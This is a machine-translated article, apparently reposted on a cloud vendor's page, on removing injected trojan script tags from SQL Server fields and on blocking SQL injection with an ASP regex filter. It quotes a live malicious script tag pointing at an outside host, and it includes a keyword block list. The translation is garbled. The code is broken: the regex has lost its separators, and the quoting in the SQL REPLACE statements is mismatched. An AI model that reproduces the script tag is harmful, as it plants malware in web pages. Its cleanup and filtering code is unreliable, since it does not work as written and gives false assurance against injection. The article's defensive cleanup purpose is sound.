Bulk replace the SQL Server database Mount horse field and prevent SQL injection attack code

Source: Internet
Author: User
Tags filter copy end execution sql sql injection sql injection attack table name

First back up the database in case of unnecessary loss. And then executes the varchar field with less than 8000 characters for all the horses being hanged.
Copy CodeThe code is as follows:
Update table name set field name =replace (field name, ' <script src=http://c.n%75clear3.com/css/c.js></script> ', ')

Where <script src=http://c.n%75clear3.com/css/c.js></script> is a horse-hanging field. The Mount horse field is cleared after execution. But there are some fields, such as content fields, which are more than 8000 characters varchar fields that need to be executed
Copy CodeThe code is as follows:
Update table name Set table entry =replace (CAST (table entry as varchar (8000)), ' <script src=http:/c.nuclear3.com/css/c.js> </Script> ' ,'')

To update the horse field, and the real estate network due to the content of more, the execution of the above statements will be suspended animation, so add an interval of two times, one treatment 15,000 to resolve.
Copy CodeThe code is as follows:
Update table name Set table entry =replace (CAST (table entry as varchar (8000)), ' <script src=http:/c.nuclear3.com/css/c.js> </Script> ' , ') where id>1 and id<15000

The above problems are generally SQL database, this is the SQL database specific injection vulnerabilities. Changing the database is not realistic, only for the above situation to prevent. The idea is to filter all the database link requests.
Copy CodeThe code is as follows:
<%
Response.Buffer = True ' Cache page
' Prevent get injection
If request.querystring <> "" Then stopinjection (Request.QueryString)
' Prevent post injection
If request.form <> "" Then stopinjection (Request.Form)
' Prevent cookies from being injected
If request.cookies <> "" Then stopinjection (Request.Cookies)
' Regular child function
Function stopinjection (Values)
Dim regEx
Set regEx = New RegExp
Regex.ignorecase = True
Regex.global = True
Regex.pattern = "'; # ([\s\b+ ()]+ () Selectupdateinsertdeletedeclare@execdbccalterdropcreatebackupifelseendandoraddsetopencloseusebeginretunasgoexists ) [\s\b+]*) "
Dim Sitem, svalue
For each sitem in Values
svalue = Values (Sitem)
If regex.test (svalue) Then
Response.Write "<script Language=javascript>alert (' illegally injected! Your actions have been recorded!! '); History.back ( -1);</script> "
Response.End
End If
Next
Set regEx = Nothing
End Function
%>

Do a generic SQL anti-injection page, include it in the Conn.asp database connection statement inside, so that the entire station to prevent SQL injection attacks. But the front desk is similar? Id= Such statements still have injection vulnerabilities, which require us to strictly filter what Request.Form and Request.QueryString get. Insist not to request ("name") such a way to get the value, usually use cookies saved content, try not to use in SQL statements query database operations.

If a friend who is unfamiliar with SQL Server can use software to implement
SQL Server database Bulk replacement tool (database and text file lookup replacement) v1.0 Chinese Green Edition

SQL Server database Bulk find substitution tool 1.2 sql Trojan Cleanup assistant



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.